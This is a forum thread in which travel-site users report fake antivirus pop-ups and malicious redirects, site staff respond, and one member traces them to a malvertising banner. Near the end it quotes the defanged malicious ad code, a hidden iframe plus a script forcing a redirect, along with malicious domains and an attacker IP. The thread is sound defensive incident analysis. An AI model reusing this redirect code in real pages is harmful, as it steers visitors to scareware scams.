For the admins: Do you have any advertisers located in Poland/Turkey that could have implemented some malicious script into your site? The IP address everything seems to be originating from is 31.210.109.37. Hope this helps.

Having done a bit more digging, there seems to be a common theme with these spyware directs and vBSEO (which according to the bottom of the page, this site uses) -

http://www.vbseo.com/blogs/rafael-benard/introduction-security-basics-123filestore-url123-redirection-issues-what-caused-how-prevent-361/

and

http://www.vbseo.com/f255/hacked-url123-info-53045/index10.html

avg has just blocked a virus as soon as i open up flyer talk

Got another virus alert today......:td:

Is anyone at IBB taking any action on this yet?

The source is clearly FT and its ad rotation.

The problem clearly affects IE, which is what most lounges have for guests to use on the lounge computers.

Browsing to FT on a lounge computer results in this malware alert, which stimulates the lounge computer security to react, which usually results in making the lounge computer useless.

Therefore FT is the source of making it impossible to use lounge computers.

Please, please, is anyone at IBB taking any action, and if so, can we have some status updates?

Hi again,

We realize this is a large issue. We are taking constant action to try to resolve it as soon as possible. I have been engaging on a daily basis in this thread, and merging new threads here, as well as responding to Contact Us requests in kind.

See http://www.flyertalk.com/forum/19008579-post119.html for the most recent information we have.

I will update as soon as I have anything new to share.

Thank you,

Paul
Community Manager

I posted this in the Technology Forum earlier, but noticed it's been well voiced on here. So why so long in tracking the threat down and removing the offending advertising, or other cause?
------------------------------------------------------------------------------------
I've had the same virus warning from my Norton Symantic 360 for the last four out of five days or nights that I've clicked to get to FT, with the most recent being early this morning. Each time, Norton blocked and removed two immediate threats, but that leaves a blank page on my screen with the option to either use the "cleaner" to remove the fraudulent threat, or cancel which gets me to my initial Windows icon page. If I just try to close the blank page at the top right, it just pops up the same box offering to get rid of the threat.

Noticed that the threat arrives with two different URL's, but both of them end with the same ".pl", so I'm surprised that IB can do nothing to track and stop the threats.

Just to be safe I do a complete scan of my system after Norton blocks the threat, and nothing shows up, so it appears to have been successfully blocked, but I'm not happy about the threat, even moreso if it's coming from FT.

bj-21.

I just had this same virus warning show up on MyFitnessPal. They also use AdChoices for their ad delivery.

I just got it again i noticed the same add appearing for some sort of discount hotel website before the "warning".

I just got the warning again. It happens only on FT. I came to this thread and I see these ads at the bottom of the thread. Makes me wonder if FT is intentionally causing these "issues"


How to Remove Malware
Remove all Traces of Malware Fast
Follow These 3 Steps Immediately!
speedmaxpc.com


Norton Antivirus™ 2012
Stronger Antivirus Protection.
Official US website. Download now!
www.Norton.com

It happened to me twice last week, IE and Flyer Talk. Had to shut down my computer to get out of it. Sure hope it didn't leave me with a virus. Normally I use a Mac but switch to a small p.c. for personal stuff when on the road.

I have had it five times in the last seven days.

Each time was an FlyerTalk.

I have a Warranty (Hardware and Software) with Dell and each time it took about 1 1/2 to 2 hours and they tell me fixed it.

Its on a different window right now.

I have had it five times in the last seven days.

Each time was an FlyerTalk.

I have a Warranty (Hardware and Software) with Dell and each time it took about 1 1/2 to 2 hours and they tell me fixed it.

Its on a different window right now.

What are they having to fix each time that takes so long? This is easy to get around, just don't click on any buttons. Open task manager and "kill" the Internet Explorer application. If you are clicking the OK or Cancel buttons in the popup each time, I would have hoped you would have figured out by the fifth time that that isn't the thing to do?

We realize this is a large issue. We are taking constant action to try to resolve it as soon as possible.

You possess the technical capability to shut off all ads until this is resolved. Why are you not employing that option?

How many tens of thousands of pageviews with ads have there been in the week since this has been reported?

Has anyone from IB been able to reproduce the problem?

What additional information can the FT community provide to help you isolate this faster?

You possess the technical capability to shut off all ads until this is resolved. Why are you not employing that option?

How many tens of thousands of pageviews with ads have there been in the week since this has been reported?

Has anyone from IB been able to reproduce the problem?

What additional information can the FT community provide to help you isolate this faster?

The problem is that shutting down the ads really won't help to solve the problem. They can't find the offending ad if the feeds are turned off. I suspect shutting down the ads would also prove to be costly.

The problem is that shutting down the ads really won't help to solve the problem. They can't find the offending ad if the feeds are turned off.They can take the ads offline for users, while they investigate on private pages that still serve up ads.

The problem is that shutting down the ads really won't help to solve the problem.

If an ad is the source of the problems, then shutting the ads off CERTAINLY would solve the problem.

IB seems very reluctant to do anything that will cost them any money. Heck there are many folks from their TopFlyer contest that finished at the end of last year who still haven't been given their small prizes. Amazingly bad form for a company that relies on its members to thrive.

Over the past few days my Internet Security has picked up and blocked a number of security threats. From the information available these appear to be emanating from Poland. Has anyone else experienced this problem?

Yes, just had AVG block one (and only opened FT - nothing else is open on the PC - using Explorer

Have taken a screenprint if someone needs it

I have had it a few times when just opening the FT site.

I, too, have been redirected to "Fake AV sites" for the last couple of days and thought there was a virus on my computer until I found this thread.

I just got a redirect and noticed something different: In previous instances, I was redirected to another website entirely without control. Just now, a pop up occurred that informed me that I had viruses on my computer and I should scan my computer, yes or no? Not sure if I did the right thing or not, but I just x'ed out the box and resumed.

Perhaps something in the offending ad has changed?

Also, is it an ad that's causing this issue? I only get the redirect when initially coming to FT. But once on FT, it doesn't matter how many pages I go through, I don't see the issue again. If a particular ad is an issue, wouldn't I get redirects on multiple occasions rather than just the initial connect?

For those who get the Norton warning, does it happen when the false virum message pops up on IE? Or, Norton comes up when you actually click a button inside the message's dialogue box?

Thanks.

The warning pops up when you open an FT page. In my case regularly on the FT BA page. I get it for no other site I visit. It is an FT imbedded asdvert.

Had the same fake AV message again today.

Disappointing that it is taking flyertalk so long to locate and block the offending add provider.

This has been going on for over a week. How long do they need...?

Seems to me that this isn't being addressed as a priority and that security isn't high on their agendas.

Getting this daily now...

Today's redirected link was
/on-linetestertrojans.pl/jnv7wqpr/al/78dee9e271084cb2/pr2/196/

This is getting pretty annoying. I seem to get this pretty consistently every morning when I first hit the FT web site. Happens immediately and I always go to flyertalk.com/forum first and not just flyertalk.com.

If this is happening on other web sites then I havent hit any of them......only seems to be affecting FT so far for me.

Add me to the list. Several times when visiting FT over the last week or so.

The Flyertalk people just don't seem interested in fixing this. I wonder how many people have been scammed by the fake virus alert so far. Gonna stop visting Flyertalk for awhile.

I get it everytime I go to FT when signed out.

When signed in, it does not happen,
because I am paying for the ad-free FT.

If an ad is the source of the problems, then shutting the ads off CERTAINLY would solve the problem.

IB seems very reluctant to do anything that will cost them any money. Heck there are many folks from their TopFlyer contest that finished at the end of last year who still haven't been given their small prizes. Amazingly bad form for a company that relies on its members to thrive.

Sure it would solve the problem, UNTIL they turned the ads back on. With the ads off, finding the problem ad will be more difficult.

Sure it would solve the problem, UNTIL they turned the ads back on. With the ads off, finding the problem ad will be more difficult.I think you're missing the point.

The ads can be turned off for all users EXCEPT for IB staff that are investigating the problem.

Gives them a little more "encouragement" to find the issue faster too, since it's impacting their bottom line.

Many people have reported in this thread that it's only happening 1x per day. So for their testing purposes, they'd basically need to do this:
1) Launch browser
2) If you get the bogus message, investigate
3) If you do not, close the browser, clear all cookies, go back to step 1.

Why does everyone think the problem is caused by the site advertisements?

I've have tried running the MVPS/PGL host files and I am still getting the redirects - this should be strong evidence there is some flaw in vBulletin/vBSEO which has been exploited.

Since I changed to Google Chrome a few days ago, I haven't had one since. With IE, I used to get them at least once a day when checking out FT. I agree that FT needs to pick up the pace on finding out where the problem is. Or people need to stop using IE and get another web browser like Google Chrome or Mozilla.

this is the ad I see every time that the warning pops up
http://s71.photobucket.com/albums/i136/polar_man/?action=view&current=suspect.jpg

The warning pops up when you open an FT page. In my case regularly on the FT BA page. I get it for no other site I visit. It is an FT imbedded asdvert.

Thanks. My NAV never popped up (I just kill IE from Task Manager). I wonder what's wong with my NAV. It is supposed to be up-to-date and says everything is OK....now I am worried...

Threat warning still appearing this morning. Tried 3 times to sign in to Flyertalk and each time the warning came up. Could not exit it and each time I have had to switch off my PC to eliminate it. Now intend to send a PM to person at Flyertalk and will not try to sign into Flyertalk again until I am sent an e-mail confirming the problem has been resolved.

I've got it several times over the past week, only ever when browsing Flyertalk.

........... and more again for me today.

I'm dissapointed that staff aren't posting updates here.

One temporary solution would be to redirect all *.pl traffic (all the redirect websites are from *.pl domains) on your computer to it localhost (127.0.0.1). This can be done by adding a line in the hosts file in the Windows\System 32 directory.

This should stop the risk of any malware/trojan viruses being downloaded. Any time a redirect occurs, it would just display a blank page (or display Google).

Past 2 weeks while accessing this forum, my Norton Virus Network Security program is reporting an Intrusion attempt from:
http://threatdetectagent.pl/944euk/al/78dee9e271084cb2/pr2/196/

Anyone experiencing this attack while accessing the forum?

Intrusion Prevention:
Intrusion Prevention scans all the network traffic that enters and exits your computer and compares this information against a set of attack signatures. Attack signatures contain the information that identifies an attacker's attempt to exploit a known operating system or program vulnerability. If the information matches an attack signature, Intrusion Prevention automatically discards the packet and breaks the connection with the computer that sent the data. This action protects your computer from being affected in any way. Intrusion Prevention protects your computer against most common Internet attacks.

I have also been getting them under the AA forum.

Probably from the Ads

I also get the redirection problem on Windows Phone 7.

I'm still getting it too, now with this web address:

http://firewalltasksprotector.pl/q88gkc5/al/78dee9e271084cb2/pr2/196/

I have been forced into manually blocking all adverts from your site currently which I do not like doing as I realise you get paid based on users taking products via the links and I like to try and do my bit to help.



As FT appear unwilling to block ads, please could you outline the process for members to do this themselves. Unfortunately this will lead to members not enabling them again once the problem is resolved, leading to a loss of revenue to FT. Surely its best if FT voluntarily do this themselves.

And Ive spend a few hours running Malwarebytes and AVG doing full scans two or three times each.

As FT appear unwilling to block ads, please could you outline the process for members to do this themselves. Unfortunately this will lead to members not enabling them again once the problem is resolved, leading to a loss of revenue to FT. Surely its best if FT voluntarily do this themselves.

http://winhelp2002.mvps.org/hosts.htm

Or

http://pgl.yoyo.org/as/

However, the redirects still occur for me with the blocked ad servers, indicating this is not an ad problem.

Yeah definitely ads. Sometimes "bad guys" buy ad space on legitimate sites. They'll usually run normal ads for a few days in case anyone is watching, then switch to an infected ad and get as many victims as they can.

When you get that alert you should report the page, the alert message and the ads that you can see to the mods.

Thanks. My NAV never popped up (I just kill IE from Task Manager). I wonder what's wong with my NAV. It is supposed to be up-to-date and says everything is OK....now I am worried...

Its not a virus really. Just a BS pop up. If you click on it then perhaps you could end up in trouble and loading something that would cause a problem on your machine but mostly like that would just be malware and not really a virus as well and still not really caught by your virus software.

I once again got this first time I hit FT today. :td:

Moved to Tech Issues for Site Admin to review.

Sitting in the lounge n reading on iPad over unsecured wifi for last hour, while waiting and no false alarm yet ... So iOS seemed safe so far, cruise critics had these problems for a while n resolve it, might want to check their posts on what n how they fixed it.

Sitting in the lounge n reading on iPad over unsecured wifi for last hour, while waiting and no false alarm yet ... So iOS seemed safe so far, cruise critics had these problems for a while n resolve it, might want to check their posts on what n how they fixed it.

On FT it seems to be an IE only problem. I've never seen it on Chrome, Safari, etc.

I have been getting this for about a month now--only on FT and only in IE9, not in Mozilla. I do a CTRL ALT DEL and turn off the processes iexplorer.exe so as to not accidentally download anything suspicious or malicious.

Good luck to all. Hopefully someone figures why it only occurs on FT . . .:-:

On FT it seems to be an IE only problem. I've never seen it on Chrome, Safari, etc.

I haven't ran across it on my laptop when running Firefox either - the discussions on CC also cited triggering "false" positive running AVG, Norton and even aVast - but not M.S.E. under Vista or Windows 7 ...

Administrators on CC has noted that measures are in place due to "MALWARE ERROR MSGS: Blocked specific graphics urls at this time "

... Please note that as a result of these past two weeks we've taken steps to block specific animated pictures sites and countdown sites because we were receiving messages that those sites may contain malware downloads. If you no longer see your glittery bug or boat or countdown, this is the reason...

Here's the link for anyone interested http://boards.cruisecritic.com/showthread.php?t=1657000

The latest phony pop-up is a poor graphic image of a "MSE alert, saw it on a desktop PC running Windows 7 using IE9 ...

Just got it again. All I know is if my work site had this problem and it took this long to resolve, we would have a new IT department! This is ridiculous.

happened again this evening

Just got it again. All I know is if my work site had this problem and it took this long to resolve, we would have a new IT department! This is ridiculous.

^

I'm still surprised that this isn't notified in a sticky at the top of each forum. As far as I can see, this thread is the only place on FT where it is discussed, but everyone I know that uses FT is getting the same problem.

I'm getting this problem repeatedly but only on the FT website. (Using IE.) Surprised that FT still hasn't found/fixed the problem. Even more surprised that FT hasn't issued any kind of notice to members.

Still there!

Come on, tech guys.

What about even a line here to say you are aware of the problem?

Still happening. And it's not limited to IE9 'cause I still use IE8 and get the alert about every second or third time I come to FT.

Its getting really ridiculous now, its totally inconvenient having to close down, restart or clean up the mess coming from FT. If it happens again tomorrow i am going to call time on FT for a while as i dont need the hassle.

Got it twice this morning. Not happening on Firefox, only on IE but I always log in via IE so have to remember to access FT via Firefox for now.

Got it again, after not getting it late last week.

Still happening. And it's not limited to IE9 'cause I still use IE8 and get the alert about every second or third time I come to FT.

Same for me. And I'm not switching browsers for the sake of one buggy site.

Same for me. And I'm not switching browsers for the sake of one buggy site.

I agree. I won't use FT on my main computer until they fix this. I'll check in from elsewhere if/when I get a chance (as I'm doing today.)

I'm disappointed that this is receiving apparently low priority.

I got it just now,also running Win7 Enterprise, IE9 and MS Antivirus. Never had a virus for it but also never clicked on it. If you ant to know who is doing it someone in FT support should click on it and see where it takes you.

Hi everyone,

We are working to determine which advertisement is causing this messaging to occur. We still believe that this messaging is from is an advertisement that appears to be exploiting a hole in *Internet Explorer* to show a *false* virus alert.

This kind of advertising is *not* approved by FT, and will immediately be blocked when it is located. Meanwhile, despite the message it shows you, you do not have a virus (from this) and FT is not infected.

*One way to avoid it is to switch browsers to Chrome or Firefox.*

Thank you for your continued patience while we work to resolve this.

Paul
Community Manager

Same for me. And I'm not switching browsers for the sake of one buggy site.

+1.

Cheers.

Same for me. And I'm not switching browsers for the sake of one buggy site.

Fair enough; but you may want to consider switching browsers because both Firefox and Chrome are more robust and less prone to security holes than IE, irrespective of this particular issue.

We are working to determine which advertisement is causing this messaging to occur. We still believe that this messaging is from is an advertisement that appears to be exploiting a hole in *Internet Explorer* to show a *false* virus alert.

This kind of advertising is *not* approved by FT, and will immediately be blocked when it is located. Meanwhile, despite the message it shows you, you do not have a virus (from this) and FT is not infected.

You've been posting this same update almost verbatim for a week. We already know we don't have a virus unless we click on the link. What we don't know is why it's taking so long for you to make progress on this. It isn't as if it's a rare and difficult to duplicate problem.

We are working to determine which advertisement is causing this messaging to occur.

This one

http://i71.photobucket.com/albums/i136/polar_man/suspect.jpg

You've been posting this same update almost verbatim for a week. We already know we don't have a virus unless we click on the link. What we don't know is why it's taking so long for you to make progress on this. It isn't as if it's a rare and difficult to duplicate problem.

If you look above, some members are either requesting an update, or have not read the updates we've posted and are stating that no admins are responding. This serves both purposes.

Internally we have not yet seen the false virus alert, even on IE, making this very difficult to resolve.

Paul

Fair enough; but you may want to consider switching browsers because both Firefox and Chrome are more robust and less prone to security holes than IE, irrespective of this particular issue.

Have you guys invested in Mozilla or hold stock in Google?! Asking people to switch browsers is NOT a solution and shouldn't even be mentioned as a fix to your issue. You may as well ask people to blog elsewhere as a solution.

The browser is NOT the cause. FT is.

Asking people to switch browsers is NOT a solution

Correct -- which is why we're proposing it as a temporary workaround rather than as a "solution" ;)

Paul

IBobi, I just got a screenshot of the image, but how do I either post it online or send it to you via PM? I saved it to a jpeg file and have it on desktop.

The image shows "Introducing the NEW Citi/Aadvantage Card" and "FlyertalkForums." It appeared when I first opened IE, at which point I got a screenshot--Start/Programs/ABBYY Screenshot Reader. At the top of the screen, the url starts, http://cleaninspectionreliability.pl [etc.].

After I got the screen, I closed the laptop, then reopened it and again opened IE, this time no problems (so far).

Okay, while surfing around FT and upon clicking to check on the Support sub-forum's page, the following pop-up displayed on my Dell laptop (running Windows 7 Ultimate, SP1 with latest security patches & update, aVast! Antivirus and ZoneAlarm - under Internet Explorer V9 (256-bit)

*** Caution/Warning/Notes: - I inserted extra spaces in between to avoid anyone accidentally clicking on it & getting "trapped" - especially on less secured PC vulunerable to these junks !! ***

http : //cleaninspectionreliability . pl/f169m/al/78dee9e271084cb2/196/

I was able to move away from this pop-up page, without doing a forced shutdown via the Task Manager, etc.

Switching to Firefox to check the page, I'm getting an alert about Citi AmericanAirlines AAdvantage advertisement link as being an untrusted connection - (graphics-based or embedded links/websites were linked on CC as being the likely source and origin of the infection)

creditcards.citicards.com uses an invalid security certificate. The certificate is not trusted because no issuer chain was provided. (Error code: sec_error_unknown_issuer)

If you understand what's going on, you can tell Firefox to start trusting this site's identification. Even if you trust the site, this error could mean that someone is tampering with your connection. Don't add an exception unless you know there's a good reason why this site doesn't use trusted identification.

This (virus warning) happens on one of my computers when browsing FT pretty regularly. On my other computer it doesn't seem to happen. Regardless, as I can reproduce at a high frequency, I will be willing to assist in finding the problem. If I need to do anything specific (like turning debug mode or capture wireshark trace) then let me know.

If you look above, some members are either requesting an update, or have not read the updates we've posted and are stating that no admins are responding. This serves both purposes.

Posting the same words saying "we're looking into it" isn't an update. If you were taking this seriously, there would be something more to report.


Internally we have not yet seen the false virus alert, even on IE, making this very difficult to resolve.


This part actually IS an update. Any reason you haven't told us that before?

A lot of people are having this problem and maybe they can help you reproduce it.

Crap. Now I'm getting it too on IE on my laptop. Switched to iPhone but come on guys, you're all exposing us here and if/when someone gets infected you're going to get sued. All for the sake of not killing your ads/revenue while you troubleshoot.

Do what we did in my previous help desk days. Kill all ads, then bring them back one by one. When people scream, you have a winner.

I'm not at IT person, so apologies if this is of no use at all to the investigation. This is my history from AVG showing the report of each time it stopped IE when I opened Flyertalk.

As you can see - it's an exploit rogue scanner, type 1929. Whatever that means.

"Exploit Rogue Scanner (type 1929)";"reliabilityprotectlow.pl/fq2f8o/al/78dee9e271084cb2/pr2/196/";"Object was blocked";"30/07/2012, 22:58:43";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

"Exploit Rogue Scanner (type 1929)";"protecttoolsmicrosoft.pl/n7065jpi/al/78dee9e271084cb2/pr2/196/";"Object was blocked";"29/07/2012, 22:06:10";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

"Exploit Rogue Scanner (type 1929)";"testpreventionremedy.pl/wd9ih3904/ss/78dee9e271084cb2/pr2/196/";"Object was blocked";"19/07/2012, 12:46:43";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

The latest redirect site: http://urlquery.net/report.php?id=108921

The redirects appear to be always to *.pl domain with the same Turkish IP address (31.210.109.37). Everyday a new *.pl domain is being used because the existing ones are being closed down - http://support.clean-mx.de/clean-mx/viruses.php?ip=31.210.109.37&sort=first%20desc

Other forums (http://www.quartertothree.com/game-talk/showthread.php?p=3182083) on the net have also reported redirect problems to an identical IP address.

Again, I think it is highly unlikely this redirect is coming from an advertisment. It is more likely to be an exploit in a script (java/php) run on this site.

[snip], despite the message it shows you, you do not have a virus (from this) and FT is not infected. [snip]

[snip] Internally we have not yet seen the false virus alert, even on IE, making this very difficult to resolve.

Paul

Thanks, Paul. Two issues:

(1) Since your more recent post indicates that you haven't seen the false virus alert yet, and since I gather that not all IE users have seen it, it would be interesting to see if maybe there might be a common denominator?


(2) After you have found and corrected the problem, could you please again issue us an assurance as to the malware question? Appreciate the earlier reassurance, and hope you are right, but since you haven't encountered the problem yourselves, is it possible yet to be certain that this thing is not installing something? (I understand that from the IT standpoint it might be possible to be certain that it isn't. I am definitely not IT-savvy, hence my question.)

This shouldn't take a week to fix.

Hell, it shouldn't take a day.

Fair enough; but you may want to consider switching browsers because both Firefox and Chrome are more robust and less prone to security holes than IE, irrespective of this particular issue.

Now you are moving into the realm of opinion. I like others will not change because one minor site I visit (Flyertalk) is not up to the challenge. I have things that will not work on FF or Chrome and I do not add software to my machines on a whim.

Anyone who is seeing this alert, could you please post your browser type and version, and post the steps you take to get to the site and the source code if possible (you can get this by right-clicking and selecting "view source").

Thank you!

Paul

Since I pay to not see ads,
it seems I am missing out on all the fun.

Therefore, when it comes time to renew...
no more money for IB from me. :td:

Anyone who is seeing this alert, could you please post your browser type and version, and post the steps you take to get to the site and the source code if possible (you can get this by right-clicking and selecting "view source").



I'm subscribed to this thread and got an email alert about this new posting. Clicking on the link to the thread in the email brought up the ususal virus alert.

Anyone who is seeing this alert, could you please post your browser type and version, and post the steps you take to get to the site and the source code if possible (you can get this by right-clicking and selecting "view source").

Thank you!

Paul

IE 9

Happens when you manually input the address in the address bar, via google.com, favourites or history.

Can't post the source code when it happens because the redirection is happening before the page loads. Avast is picking it up as URL:Mal - HTTP/1.1 301 but doesn't list the offending problem. I have installed a logger to pick up where the redirecting is originating from.

Paging Sargent Schultz, paging Sargent Schultz...

Anyone who is seeing this alert, could you please post your browser type and version, and post the steps you take to get to the site and the source code if possible (you can get this by right-clicking and selecting "view source").

Thank you!

Paul

I am using Chrome these days but switch to IE to see if the problem is still there. I tested it a few minutes ago and it happened again. This time it happened when I just typed in www.flyertalk.com. I had just clicked on Forums as well, and almost instantly there was the virus-alert screen. This time, however, there was one change to the virus-alert screen. Instead of the FT background, in which we can see the rest of the FT screen, this time the entire screen, except for the alert, was blank. I did a snip-and-save, if you want it, though I don't know how to send a jpg file via PM or to post it online. Unfortunately, the snip didn't save the http: portion of the screen. However, visible on the bottom toolbar are the words, "Viruses were found" in one box and in the next, "Flyertalk Forums."

I tried to right-click on "view source," per your post above, but couldn't. Right-clicking, any clicking, nothing, worked. One more thing changed, however, in addition to the all-white screen background. I was able to shut the screen down with Ctrl Alt Del and in the past even that procedure has not worked.

I think that the posters who say that this screen hits once a day are onto something. I think it usually--but not always--has appeared once/day. Not a hundred percent, however.

There was what might be another possible oddity following my turning the laptop off and turning it back on. After I turned it back on, this time, and opened IE and FT again, FT went blank for a split second, then came back on. So I am wondering if the appearance of the "false virus" screen does do something to the browser or computer, at least for the day?

Has anyone with an ads-free account (Faces of FlyerTalk, for example) been subjected to the redirect/virus warning?

Note that if you ever visit FlyerTalk without logging in, your ads-free status does not apply then, and an ad could cause this warning.

Thank you,

Paul

Has anyone with an ads-free account (Faces of FlyerTalk, for example) been subjected to the redirect/virus warning?

Note that if you ever visit FlyerTalk without logging in, your ads-free status does not apply then, and an ad could cause this warning.l

Paul,

I went to http://www.flyertalk.com/forum/usercp.php to try logging in to test your question.

I got the login page and immediately got hit with the "virus warning."

This time, though, my own (real) MSE detected that a virus had been installed (just from going to the page!).

http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Rogue%3aJS%2fFakePAV&threatid=2147638814

So, I couldn't actually login before getting infected.

This is nasty stuff.

I'm not inclined to want to try to test more in case whatever the next re-direct/hijack is manages to actually damage my computer with something that my AV program misses.

Has anyone with an ads-free account (Faces of FlyerTalk, for example) been subjected to the redirect/virus warning?

Note that if you ever visit FlyerTalk without logging in, your ads-free status does not apply then, and an ad could cause this warning.

Thank you,

Paul

What is a free ads account and how do you get one?

And the alert always appears very very soon from typing in the Flyertalk URL so I doubt people had a chance to logon before there were molestered with this warning.

I usually type ww.flyert and then suggestions appear and I click straight onto BA executive club and the warning appears every time I have not accessed the site for a while without fail.

Maybe you could ask people to fill in a small questionnaire to agther similar characteristics and to be able to replicate the problem.

IE 9
shortcut in favorites to : http://www.flyertalk.com/forum/

also does in on IE 8 on laptop - same shortcut

Most recent warning for me was yesterday morning. Later in the evening no problem, and this afternoon was okay also. Coincidence, or does time of day (in my case the most warnings have popped up usually very early 3-4 AM eastern time, or a bit later in the morning) have anything to do with it occuring?

Anyone seeing something similar timewise?

bj-21.

Most recent warning for me was yesterday morning. Later in the evening no problem, and this afternoon was okay also. Coincidence, or does time of day (in my case the most warnings have popped up usually very early 3-4 AM eastern time, or a bit later in the morning) have anything to do with it occuring?

Anyone seeing something similar timewise?

bj-21.

If I am up late I seem to get it a few minutes after midnight

As noted by others, I generally get only one per 24 hour period.

IE 9
shortcut in favorites to : http://www.flyertalk.com/forum/

also does in on IE 8 on laptop - same shortcut

I'm exactly the same as this.

After advice on this forum I started using Chrome when accessing Flyertalk and have had no problems with this fake virus thing....yesterday I mistakenly used IE and lo and behold up pops the virus warning so if you can use Chrome!

After advice on this forum I started using Chrome when accessing Flyertalk and have had no problems with this fake virus thing....yesterday I mistakenly used IE and lo and behold up pops the virus warning so if you can use Chrome!

Started using Chrome also, though I use it for all websites not just FT. Another benefit is that it seems to run much faster than IE. Probably won't go back to IE. FT must own stock in Google.

It is only happening for me when I am logged in - if I am logged out/cookies cleared, it doesn't seem to happen.

Can we have a little more feedback as to why this hasn't been repaired yet? I even sent screen shots and didn't even received an acknowledgement.

With all due respect11 days (with all the expert organisations available) to help detect and kill this issue feels to me like around 8 days longer than it should be. All feels as though the response is out of kilter with the urgency.

A new screen appeared today, when I used Chrome. Sgnificance: I think some IE material might have been residual when I went to Chrome.

Sequence of events:

(1) Browsed Internet (CNN), using IE. (My IE browser is set to delete cookies whenever IE browser is closed.)
(2) Still in IE, went to FlyerTalk.
(3) Clicked on Forums.
(4) Virus-alert message appeared, on an all-white background, without any Flyertalk screen in the background. Made a snip.
(5) Tried to right-click for page source but nothing worked except Ctrl Alt Del.
(6) Turned computer off, using on-off button.
(7) Turned computer back on. (Note that at this point IE had not been automatically closed down, which would have deleted cookies automatically--though of course it did not reopen when I restarted the computer.)
(8) Opened Chrome. (IE is still off.) Went to Flyertalk.
(9) Could not open Chrome, got a new screen box, which read:



Plug-in Unresponsive

[yellow caution icon with exclamation mark) The following plug-in is unresponsive: Unknown

Would you like to stop it? [boxes to check] Yes No

(10) Checked IE for residual cookies, found a Favicon (right-clicking showed this as owned by Flyertalk), and an "IE9 CompatViewList.xml", which rightclicking on showed as owned by Microsoft.

I can send a snip of the new screen but would need instructions on how to PM a jpg file.

Urgent @ Admin

I have found the source of the redirect (all links have been delibrately broken by me in the http bit to inadvertently stop any users clicking on them):

It is coming from the HotelDetect banner (which is hosted here hxxp://adliclick.com/banner.php?campaign_id=12175&rc=475737972919972). This is a copy of the request header:

(Request-Line):GET /banner.php?campaign_id=12175&rc=475737972919972 HTTP/1.1
Accept:application/javascript, */*;q=0.8
Referer:http://www.flyertalk.com/forum/
Accept-Language:en-GB
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding:gzip, deflate
Host:adliclick.com
Connection:Keep-Alive


This appears to be a bogus site.

The above banner page contains the following malicious code:

document.write('<a href="hxxp://hoteldetect.net" target="_blank"><img src="hxxp://adliclick.com/banners/12175/475737972919972/1.jpg" alt="" style="border:none" /></a>');document.write('<iframe src="hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" width="1" height="1"></iframe>');

The iframe within this code is redirecting to a html page (hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX) which contains the following HTML code:

<html>
<body>
<script>
window.top.location.href="hxxp://systemoptimizerdeliverer.pl/m936f48zl6/al/78dee9e271084cb2/196/";
</script>
</body>
</html>


I cannot find exactly where the source for the adliclick.com is coming from in your source code (I strongly suggest checking all your scripts for references to it), but I have a copy of the source codes from all sites when the redirect hit me. Let me know if you want copies.

Good job MoneyBagger. (Work that should have been done by IB/Flyertalk over a week ago.)

Nice work MoneyBagger.

Urgent @ Admin

I have found the source of the redirect (all links have been delibrately broken by me in the http bit to inadvertently stop any users clicking on them):


^ Good job.

Just for my academic interest, how hard was this to work out? Was it something that any competent IT person could work out, or was it more specialised?

We just blocked that url from all channels but it may take a few minutes to process. Please let me know if you keep seeing it.

^ Good job.

Just for my academic interest, how hard was this to work out? Was it something that any competent IT person could work out, or was it more specialised?

Thanks

I have no formal IT training, but have always been fairly competent/keen to learn when it comes to IT. I have had some spare time this week and spent a while on this case. I cannot stress how much Google is your friend though.

Anyone with basic website (HTML/java) knowledge could have worked it out, the key though was being able to replicate the problem with a logger tracking all the traffic (the redirect happens within a split second). I found a logger (HTML Analyzer) last night which does exactly that, but couldn't replicate the problem. However, it happened today and I was able look through the history (which is quite in depth) and work back from the redirect site with the malware back to the FT forums.

I think the key thing I missed was the fact that the redirects were intermittent. Initially I mistakenly thought there was an exploit in the forum software as there have been problems previously on other forums being exploited. But the intermittent nature shows it was coming from something on the site that rotates (i.e. a banner/advert).

I would be interested to know how the bogus site was able to operate a banner here. There appears to be no track record of the company/site and the domain name owners have a whois block service so you don't know where they are from.

Good work, MoneyBagger! ^

Any ideas on the purpose of the redirect? Is the purpose likely just to "sell" bogus virus-removal programs?

Good work, MoneyBagger! ^

Any ideas on the purpose of the redirect? Is the purpose likely just to "sell" bogus virus-removal programs?

Essentially yes. Here's how it works:

http://www.f-secure.com/weblog/archives/00002053.html
http://www.pcworld.com/businesscenter/article/208592/beware_fake_microsoft_security_essentials.html
http://blogs.technet.com/b/mmpc/archive/2010/02/24/if-it-calls-itself-security-essentials-2010-then-it-s-possibly-fake-innit.aspx

There are some good online sites which you can use to check if a site is legitimate or infected:

http://www.virustotal.com/ - Online virus scanner/site checker
http://urlquery.net/ - Site Scanner
http://www.unmaskparasites.com/ - Site Scanner
http://zulu.zscaler.com/ - Site scanner/inspector
http://www.avgthreatlabs.com/sitereports/ - Site scanner (part of AVG)

Essentially yes ... There are some good online sites which you can use to check if a site is legitimate or infected:


Bravo, kudos & thanks to MoneyBagger for helping FT and rest of us - some of us knew something just isn't right ... Using Firefox on my own laptop now but when on the road, it isn't a matter of choice to avoid or not use IE 8 or 9.

When we had similar issues & popups randomly over at Cruisecritic dot com, it drove some of us nuts for weeks - and it was tracked down only a few weeks ago (the details & threads/links are mostly gone/deleted & no longer available to members) - my best recollection of the summary finding was that it was malware codes/scripts hidden in graphics/logos commonly used by CC members, and it got in & launched itself - very similiar MSE phony threat reports and offering to fix it (as we've saw them here on FT.)

Furthermore, the danger and risks pose is that, one's credit card/names & other personal info were exposed in the course of purchasing/authorizing/downloading the said "fixes" in solving the security problem - escalating and potential risking hundreds if not thousands in charges to one's CC account.

The practice goes back to the 1980's when we're surfing AOL and bragging about 56K modems - we've come a long way but the bad apples are still out there, and getting more sophisticated. My firewall, antivirus & spyware logs and reports all looked clean, deep & full scanning sweeps done showing no harm inflicted thus far, yet (fingers crossed :p )

Essentially yes. Here's how it works:

